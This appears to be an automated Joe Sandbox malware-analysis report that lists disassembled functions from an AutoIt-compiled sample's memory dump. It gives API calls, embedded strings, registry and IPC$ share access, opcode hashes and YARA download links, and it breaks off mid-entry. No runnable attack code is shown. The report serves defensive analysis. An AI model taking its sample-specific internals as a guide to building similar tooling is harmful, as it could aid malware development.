                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C5A3CB
                                                  • GetDriveTypeW.KERNEL32 ref: 00C5A418
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5A460
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5A497
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C5A4C5
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 96ce55c3e6adb7e7857c8ebe09b5061f5d3da143064d723937ffb33c4d138199
                                                  • Instruction ID: d5100a8e1ea46ab35396b5fba42dbc86d4a53dfd93794f57cdcdc21ad9227580
                                                  • Opcode Fuzzy Hash: 96ce55c3e6adb7e7857c8ebe09b5061f5d3da143064d723937ffb33c4d138199
                                                  • Instruction Fuzzy Hash: DD518B751042099FC700EF21C89196AB3E4FF89758F1089ADF89A572A1DB71EE4ECB52
                                                  Function 00C4F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00C2E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C4F8DF
                                                  • LoadStringW.USER32(00000000,?,00C2E029,00000001), ref: 00C4F8E8
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • GetModuleHandleW.KERNEL32(00000000,00CB5310,?,00000FFF,?,?,00C2E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C4F90A
                                                  • LoadStringW.USER32(00000000,?,00C2E029,00000001), ref: 00C4F90D
                                                  • __swprintf.LIBCMT ref: 00C4F95D
                                                  • __swprintf.LIBCMT ref: 00C4F96E
                                                  • _wprintf.LIBCMT ref: 00C4FA17
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C4FA2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 984253442-2268648507
                                                  • Opcode ID: 68d4988c2f945199ef05b637bf6e034bfb694d06f065b72b3306e26cc51cec9a
                                                  • Instruction ID: f7d467ad4c077f49641038bc7a98fe21e83ae99fe38d1c50160ec3f83d732134
                                                  • Opcode Fuzzy Hash: 68d4988c2f945199ef05b637bf6e034bfb694d06f065b72b3306e26cc51cec9a
                                                  • Instruction Fuzzy Hash: 0B412D7284410DAACB15FBE0DD96EFEB7B8AF15300F5000A9B60567092DE715F4DDB61
                                                  Function 00C7BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C79207,?,?), ref: 00C7BA56
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BA6D
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BA78
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BA85
                                                  • GlobalLock.KERNEL32(00000000), ref: 00C7BA8E
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BA9D
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00C7BAA6
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BAAD
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C79207,?,?,00000000,?), ref: 00C7BABE
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C82CAC,?), ref: 00C7BAD7
                                                  • GlobalFree.KERNEL32(00000000), ref: 00C7BAE7
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00C7BB0B
                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C7BB36
                                                  • DeleteObject.GDI32(00000000), ref: 00C7BB5E
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C7BB74
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: bff91803f14ca8e60bf5d42c33b443cc41909cc9e009caea5165c7a11e44290c
                                                  • Instruction ID: 5275017af6dda0fc54dcb4f1c8384c4ae5f8a0aee01fea022260d249297d7af2
                                                  • Opcode Fuzzy Hash: bff91803f14ca8e60bf5d42c33b443cc41909cc9e009caea5165c7a11e44290c
                                                  • Instruction Fuzzy Hash: 00410575600209AFDB119F65DC88FAEBBB8FB89725F108068F919D7260D7709E42DB60
                                                  Function 00C5D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __wsplitpath.LIBCMT ref: 00C5DA10
                                                  • _wcscat.LIBCMT ref: 00C5DA28
                                                  • _wcscat.LIBCMT ref: 00C5DA3A
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C5DA4F
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DA63
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C5DA7B
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C5DA95
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C5DAA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                  • String ID: *.*
                                                  • API String ID: 34673085-438819550
                                                  • Opcode ID: 5f3fdbb107349d8dd11d4dcc9b932964164147b384b12f7fa4ec279974a4e7ac
                                                  • Instruction ID: 252fc148a48684394fd2830db700b50380b34534c936e02e8a3201566e30065a
                                                  • Opcode Fuzzy Hash: 5f3fdbb107349d8dd11d4dcc9b932964164147b384b12f7fa4ec279974a4e7ac
                                                  • Instruction Fuzzy Hash: F381B0795043459FCB34EF65C840AAAB7E4AF89311F14482EFC9AC7251EA30DAC9CB56
                                                  Function 00C7C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C7C1FC
                                                  • GetFocus.USER32 ref: 00C7C20C
                                                  • GetDlgCtrlID.USER32(00000000), ref: 00C7C217
                                                  • _memset.LIBCMT ref: 00C7C342
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C7C36D
                                                  • GetMenuItemCount.USER32(?), ref: 00C7C38D
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C7C3A0
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C7C3D4
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C7C41C
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C7C454
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C7C489
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: 51b3ed68e7db5324fba3e0717ef9bfd8ea6b890f5fb85fc63a6c530c4fa1c75f
                                                  • Instruction ID: efd846b2eddd558f722db4c9e8bb21b05075bdab22d8f3945255fa24911ba2ea
                                                  • Opcode Fuzzy Hash: 51b3ed68e7db5324fba3e0717ef9bfd8ea6b890f5fb85fc63a6c530c4fa1c75f
                                                  • Instruction Fuzzy Hash: D9817D706083029FD710DF15C8D4BBABBE8FB88714F00892EF9A9972A1D770D945DB62
                                                  Function 00C6731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00C6738F
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C6739B
                                                  • CreateCompatibleDC.GDI32(?), ref: 00C673A7
                                                  • SelectObject.GDI32(00000000,?), ref: 00C673B4
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C67408
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C67444
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C67468
                                                  • SelectObject.GDI32(00000006,?), ref: 00C67470
                                                  • DeleteObject.GDI32(?), ref: 00C67479
                                                  • DeleteDC.GDI32(00000006), ref: 00C67480
                                                  • ReleaseDC.USER32(00000000,?), ref: 00C6748B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 749eb7381b9284ffee5326a72cd99d083c7640e333fd127e9985feff6fb8ce60
                                                  • Instruction ID: 0183ae7a1fc68c0f68861dd391f8d1b074fb6b9c1fc8ee5aa76eae9bea506184
                                                  • Opcode Fuzzy Hash: 749eb7381b9284ffee5326a72cd99d083c7640e333fd127e9985feff6fb8ce60
                                                  • Instruction Fuzzy Hash: 40513875904209EFCB24CFA9CC84FAEBBB9EF48310F14852DF95997320C771A9419B50
                                                  Function 00BF6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C10957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BF6B0C,?,00008000), ref: 00C10973
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BF6BAD
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF6CFA
                                                    • Part of subcall function 00BF586D: _wcscpy.LIBCMT ref: 00BF58A5
                                                    • Part of subcall function 00C1363D: _iswctype.LIBCMT ref: 00C13645
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-1018226102
                                                  • Opcode ID: 653d5c28297eb7bd97c886a30dafa6cbb2aea4166d5e459395c3d532adc58cb6
                                                  • Instruction ID: c9cfe08d16f3d24b22c2daf28da9555a39103054d9a07e0518cd8bec8bc61d4d
                                                  • Opcode Fuzzy Hash: 653d5c28297eb7bd97c886a30dafa6cbb2aea4166d5e459395c3d532adc58cb6
                                                  • Instruction Fuzzy Hash: 5C02CE301083449FC724EF24D8819AFBBE5FF99314F10496DFA99972A1DB30DA89DB52
                                                  Function 00C52D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52D50
                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C52DDD
                                                  • GetMenuItemCount.USER32(00CB5890), ref: 00C52E66
                                                  • DeleteMenu.USER32(00CB5890,00000005,00000000,000000F5,?,?), ref: 00C52EF6
                                                  • DeleteMenu.USER32(00CB5890,00000004,00000000), ref: 00C52EFE
                                                  • DeleteMenu.USER32(00CB5890,00000006,00000000), ref: 00C52F06
                                                  • DeleteMenu.USER32(00CB5890,00000003,00000000), ref: 00C52F0E
                                                  • GetMenuItemCount.USER32(00CB5890), ref: 00C52F16
                                                  • SetMenuItemInfoW.USER32(00CB5890,00000004,00000000,00000030), ref: 00C52F4C
                                                  • GetCursorPos.USER32(?), ref: 00C52F56
                                                  • SetForegroundWindow.USER32(00000000), ref: 00C52F5F
                                                  • TrackPopupMenuEx.USER32(00CB5890,00000000,?,00000000,00000000,00000000), ref: 00C52F72
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C52F7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 3993528054-0
                                                  • Opcode ID: 7b80723b2f4953723e183ea30e41386029fe03bc5cfc2739d491ef432e1e5043
                                                  • Instruction ID: b402df191d1636ce4feab83d17099e9fa39b5c3008178aac4001fba68e3b8f3d
                                                  • Opcode Fuzzy Hash: 7b80723b2f4953723e183ea30e41386029fe03bc5cfc2739d491ef432e1e5043
                                                  • Instruction Fuzzy Hash: 3B712834600215BFEB218F54DC86FAABFA4FF06326F100216FA29A61E1C7B15D98D758
                                                  Function 00C477DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • _memset.LIBCMT ref: 00C4786B
                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C478A0
                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C478BC
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C478D8
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C47902
                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C4792A
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C47935
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C4793A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                  • API String ID: 1411258926-22481851
                                                  • Opcode ID: 8a9b091fce5994904a2e08a71078f1b85acc1358511c80283951b54c76ee0b96
                                                  • Instruction ID: 11c9cfe9ee1cb604f3e489e6790d88c8e29760c8657e295f0e887223fc255b15
                                                  • Opcode Fuzzy Hash: 8a9b091fce5994904a2e08a71078f1b85acc1358511c80283951b54c76ee0b96
                                                  • Instruction Fuzzy Hash: 33411972C1462DABCB11EBA4DC95DFDB7B8FF18310F4441A9E915A31A1DB305E09CB90
                                                  Function 00C70E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: 5c420216ccff7cffea4016e60308c6afbc8ce5b937cdfd2017ca50f552730320
                                                  • Instruction ID: a40aacf4f7431373062f9c041379ab8f8d884f0baf806c56c301080dc33f1f79
                                                  • Opcode Fuzzy Hash: 5c420216ccff7cffea4016e60308c6afbc8ce5b937cdfd2017ca50f552730320
                                                  • Instruction Fuzzy Hash: DD418D7111024ACBCF20EF60D856AEF3764FF16304F648455FC691B292DB709E9AEBA0
                                                  Function 00C4F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C2E2A0,00000010,?,Bad directive syntax error,00C7F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C4F7C2
                                                  • LoadStringW.USER32(00000000,?,00C2E2A0,00000010), ref: 00C4F7C9
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • _wprintf.LIBCMT ref: 00C4F7FC
                                                  • __swprintf.LIBCMT ref: 00C4F81E
                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C4F88D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                  • API String ID: 1506413516-4153970271
                                                  • Opcode ID: 39f021e7afba0046e2a64ebe2f1d20b8eb904b93091def6e9236b1cc5450c23c
                                                  • Instruction ID: a005d986bda980784ca0ba209959ae6999a335fd8121da18d5e1ee1d19f4dacc
                                                  • Opcode Fuzzy Hash: 39f021e7afba0046e2a64ebe2f1d20b8eb904b93091def6e9236b1cc5450c23c
                                                  • Instruction Fuzzy Hash: BA218C3284021EEBCF11AF90CC5AEFE7778FF19304F0404A9F615660A2EA719658DB50
                                                  Function 00C552C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                    • Part of subcall function 00BF7924: _memmove.LIBCMT ref: 00BF79AD
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C55330
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C55346
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C55357
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C55369
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C5537A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: 70710976af2a558c3713c13e8a69416a1fe7aaa68d1b7f3c40fcab54aa371bc8
                                                  • Instruction ID: 047f3ba5c3305bd05d0771343271f85e750f3ec71fc0419ce2c52890a092cfb0
                                                  • Opcode Fuzzy Hash: 70710976af2a558c3713c13e8a69416a1fe7aaa68d1b7f3c40fcab54aa371bc8
                                                  • Instruction Fuzzy Hash: 0B11862199052E7AD724B765CC5ADFFBBBCEB96B44F0004A9B915930E1EDA00E4DC5B0
                                                  Function 00C546B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
